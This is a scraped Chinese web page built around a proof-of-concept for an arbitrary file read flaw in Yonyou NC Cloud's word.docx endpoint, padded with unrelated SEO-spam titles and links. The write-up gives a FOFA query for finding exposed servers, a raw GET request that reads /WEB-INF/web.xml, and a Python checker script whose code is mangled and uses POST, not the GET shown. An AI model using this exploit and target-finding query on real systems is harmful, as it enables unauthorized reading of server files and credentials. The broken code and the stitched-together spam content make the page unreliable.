当前位置: 首页 > news >正文

网站安全检测中心佛山网站设计定制

网站安全检测中心,佛山网站设计定制,网站建设兼职合同模板,求网站2021给个网址声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 一、产品介绍 用友 NC Cloud#xff0c;大型企业数字化平台#xff…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 一、产品介绍 用友 NC Cloud大型企业数字化平台 聚焦数字化管理、数字化经营、数字化商业帮助大型企业实现 人、财、物、客的全面数字化从而驱动业务创新与管理变革与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类68个细分行业涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案帮助企业全面落地数字化。 二、漏洞描述 用友NC Cloud word.docx接口存在任意文件读取漏洞 三、fofa语法 bodyUClient.dmg 四、漏洞复现 poc GET /portal/docctr/open/word.docx?disp/WEB-INF/web.xml HTTP/1.1 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive 五、poc.py import requestsdef verify(ip):url f{ip}/portal/docctr/open/word.docx?disp/WEB-INF/web.xmlheaders {User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1),Accept: * / *,Connection: Keep - Alive}try:response requests.post(url, headersheaders)print(response)# 验证成功输出相关信息if response.status_code 200:print(f{ip}存在用友NC word.docx接口任意文件读取漏洞)else:print(漏洞不存在)except Exception as e:passif __name__ __main__:self input(请输入目标主机IP地址)verify(self)
http://www.w-s-a.com/news/165108/

相关文章:

  • 买个网站服务器多少钱重庆做的好的房产网站
  • 深圳定制建站网站建设推广关键词怎么设置
  • 宝山网站建设 网站外包修改wordpress版权
  • 建立网站的基本步骤新网站多久会被百度收录
  • 软件设计开发流程图廊坊关键词seo排名方案
  • 南山住房和建设局网站网站被k 多久恢复
  • 阿里买域名 电脑做网站做简历哪个网站好
  • 个人网站免费服务器单页网站的域名
  • 网站设计简单讲解小店怎么做网站
  • 校园网站的意义wordpress去除更新
  • 网站开发用python吗常用的网页开发工具有哪些
  • 北京市住房建设投资建设网站做商城网站要哪些流程
  • seo网站改版杭州建设局官网
  • 物流网站建设策划书泰然建设网站
  • 百度做网站的费用采集发布wordpress
  • 网站运维公司有哪些防录屏网站怎么做
  • 昆明做网站seo的网站制作专业
  • 聊城制作手机网站公司wordpress 头条
  • 商城微网站模板一般电商网站做集群
  • winserver2008上用iis发布网站嵊州网站制作
  • 网站内页权重怎么查辽宁建设工程信息网怎么上传业绩
  • 丰都网站建设价格镇江网站制作费用
  • app手机网站建设黄网站建设定制开发服务
  • 百度网盘app下载徐州优化网站建设
  • 附近网站电脑培训班展台设计方案介绍
  • 河南便宜网站建设价格低上海高端室内设计
  • 保险网站有哪些平台wordpress会员vip购买扩展
  • 网站怎么做图片转换广州车陂网站建设公司
  • 下载flash网站网站设计书的结构
  • 水利建设公共服务平台网站放心网络营销定制